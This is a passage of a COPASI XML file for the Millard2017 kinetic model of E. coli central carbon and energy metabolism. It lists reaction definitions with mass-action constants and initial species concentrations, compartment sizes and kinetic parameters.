<Product metabolite="Metabolite_74" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4897" name="k1" value="0.1"/>
<Constant key="Parameter_4896" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4897"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_70"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4896"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_74"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_61" name="PIT" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_61">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-23T17:08:39Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_75" stoichiometry="1"/>
<Substrate metabolite="Metabolite_73" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_56" stoichiometry="1"/>
<Product metabolite="Metabolite_64" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4895" name="k1" value="0.1"/>
<Constant key="Parameter_4894" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4895"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_75"/>
<SourceParameter reference="Metabolite_73"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4894"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_56"/>
<SourceParameter reference="Metabolite_64"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_62" name="XCH_P" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_62">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2013-10-31T12:45:19Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_71" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_75" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4893" name="k1" value="0.1"/>
<Constant key="Parameter_4892" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4893"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_71"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4892"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_75"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_63" name="XCH_ACE1" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_63">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-03T00:04:32Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_69" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_76" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4891" name="k1" value="0.1"/>
<Constant key="Parameter_4890" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4891"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_69"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4890"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_76"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_64" name="_ACE_OUT" reversible="false" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_64">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-03T00:06:14Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_72" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfConstants>
<Constant key="Parameter_4889" name="k1" value="5.556e-05"/>
</ListOfConstants>
<KineticLaw function="Function_13" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[extracellular]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_80">
<SourceParameter reference="Parameter_4889"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_81">
<SourceParameter reference="Metabolite_72"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_65" name="XCH_ACE2" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_65">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-03T00:13:46Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_76" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_72" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4888" name="k1" value="0.1"/>
<Constant key="Parameter_4887" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4888"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_76"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4887"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_72"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
<Reaction key="Reaction_66" name="GL6P_HYDROLYSIS" reversible="true" fast="false" addNoise="false">
<MiriamAnnotation>
<rdf:RDF xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Reaction_66">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2015-01-22T11:03:40Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ListOfSubstrates>
<Substrate metabolite="Metabolite_13" stoichiometry="1"/>
</ListOfSubstrates>
<ListOfProducts>
<Product metabolite="Metabolite_26" stoichiometry="1"/>
</ListOfProducts>
<ListOfConstants>
<Constant key="Parameter_4886" name="k1" value="0.1"/>
<Constant key="Parameter_4885" name="k2" value="0.1"/>
</ListOfConstants>
<KineticLaw function="Function_14" unitType="Default" scalingCompartment="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]">
<ListOfCallParameters>
<CallParameter functionParameter="FunctionParameter_69">
<SourceParameter reference="Parameter_4886"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_68">
<SourceParameter reference="Metabolite_13"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_78">
<SourceParameter reference="Parameter_4885"/>
</CallParameter>
<CallParameter functionParameter="FunctionParameter_79">
<SourceParameter reference="Metabolite_26"/>
</CallParameter>
</ListOfCallParameters>
</KineticLaw>
</Reaction>
</ListOfReactions>
<ListOfModelParameterSets activeSet="ModelParameterSet_1">
<ModelParameterSet key="ModelParameterSet_1" name="Initial State">
<MiriamAnnotation>
<rdf:RDF
xmlns:dcterms="http://purl.org/dc/terms/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#ModelParameterSet_1">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2021-01-04T13:52:04Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<ModelParameterGroup cn="String=Initial Time" type="Group">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism" value="0" type="Model" simulationType="time"/>
</ModelParameterGroup>
<ModelParameterGroup cn="String=Initial Compartment Sizes" type="Group">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm]" value="1" type="Compartment" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[extracellular]" value="100" type="Compartment" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_periplasm]" value="0.25" type="Compartment" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="String=Initial Species Values" type="Group">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ACCOA]" value="9.3188417393280467e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ACO]" value="1.9361063506980811e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ACP]" value="8.6664191621497897e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[AKG]" value="3.6004593044112428e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[BPG]" value="3.9391164070065283e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[CIT]" value="5.3916512352148431e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[DAP]" value="2.6322420431957092e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[E4P]" value="7.9070668605878026e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[F6P]" value="1.5763946066185716e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[FDP]" value="1.6970884333545056e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[FUM]" value="1.2834084187950583e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[G6P]" value="5.1858431598197925e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[GAP]" value="7.0569319205180695e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[GL6P]" value="1.9642127972845123e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[GLX]" value="5.3057531901769871e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ICIT]" value="6.3703667072070214e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[KDPG]" value="5.2282835243426587e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MAL]" value="6.2157714956357455e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[NAD]" value="8.5005146998199353e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[NADH]" value="9.5424644986276282e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[NADP]" value="1.0107393022490749e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[NADPH]" value="5.3695089575660012e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[OAA]" value="7.698680164822324e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[PEP]" value="6.0043053493910241e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[PGA2]" value="2.2781584503402476e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[PGA3]" value="4.193061098189998e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[PGN]" value="7.9251241914975207e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[PYR]" value="1.4265932662081769e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[Q]" value="1.9639248234274043e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[QH2]" value="4.0582160314737531e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[R5P]" value="6.4341569172230717e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[RU5P]" value="2.0585278619139365e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[S7P]" value="8.5505452688743842e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[SUC]" value="1.3011154186902826e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[SUCCOA]" value="2.474363866819711e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[X5P]" value="3.0473116183618054e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ei]" value="2.0114735423457258e+17" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[eiP]" value="3.8428260841912832e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[eiia]" value="8.5525575608716513e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[eiiaP]" value="2.8940514631167993e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[eiicb]" value="28419065176204708" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[eiicbP]" value="2.0633142966785149e+17" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[hpr]" value="1.1515043650212757e+17" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[hprP]" value="3.1621128357967836e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[icd]" value="3.268479698336007e+17" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[icdP]" value="3.0988284800748687e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[tal]" value="1.6747235514063363e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[talC3]" value="3.4458121569610027e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[tkt]" value="8.3290922824539628e+18" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[tktC2]" value="3.3825893667480527e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ADP]" value="3.6031354180883579e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[AMP]" value="1.1216394702819669e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ATP]" value="1.5490159511281688e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[CAMP]" value="5.5592272342984884e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[COA]" value="3.0110704285000001e+20" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[HCO3]" value="8.4309971997999995e+20" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[P]" value="5.8799869312313674e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MG]" value="6.0221408570000002e+20" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MgADP]" value="1.581911401402443e+20" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MgATP]" value="1.42797586195125e+21" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MgFDP]" value="2.4920534997863522e+19" type="Species" simulationType="assignment"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ASP]" value="7.0459048026900044e+20" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[CYS]" value="5.1188197284500005e+19" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[MN]" value="1.8066422571000001e+20" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[Hin]" value="19043681497464356" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[H2O]" value="6.0221408570000002e+20" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[O2]" value="1.26464957997e+20" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[FAD]" value="1.5291076608469261e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[FADH2]" value="4.4930331966157731e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_cytoplasm],Vector=Metabolites[ACE]" value="1.1243807689168963e+17" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[extracellular],Vector=Metabolites[GLCx]" value="3.8140444595268072e+20" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[extracellular],Vector=Metabolites[Px]" value="6.0221408570000002e+23" type="Species" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[extracellular],Vector=Metabolites[ACEx]" value="1.1242558416077754e+19" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_periplasm],Vector=Metabolites[Hout]" value="8091472453256321" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_periplasm],Vector=Metabolites[GLCp]" value="6.0723801560420096e+17" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_periplasm],Vector=Metabolites[Pp]" value="1.5054491124235709e+21" type="Species" simulationType="reactions"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Compartments[cell_periplasm],Vector=Metabolites[ACEp]" value="28107957631558488" type="Species" simulationType="reactions"/>
</ModelParameterGroup>
<ModelParameterGroup cn="String=Initial Global Quantities" type="Group">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[FEED]" value="0.23000000000000001" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KdADPMg]" value="1.2777099999999999" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KdATPMg]" value="0.084763400000000003" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KdFDPMg]" value="5.8099999999999996" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KmICIT_ACN]" value="9.3135200000000005" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KmCIT_ACN]" value="0.062888200000000005" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KmACO_ACN]" value="0.02001" type="ModelValue" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Values[KeqNDH]" value="27.619299999999999" type="ModelValue" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="String=Kinetic Parameters" type="Group">
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGI]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGI],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PGI],ParameterGroup=Parameters,Parameter=k2" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PFK]" type="Reaction">
<ModelParameter cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[PFK],ParameterGroup=Parameters,Parameter=k1" value="0.10000000000000001" type="ReactionParameter" simulationType="fixed"/>
</ModelParameterGroup>
<ModelParameterGroup cn="CN=Root,Model=Millard2017 - E. coli central carbon and energy metabolism,Vector=Reactions[FBA]" type="Reaction">
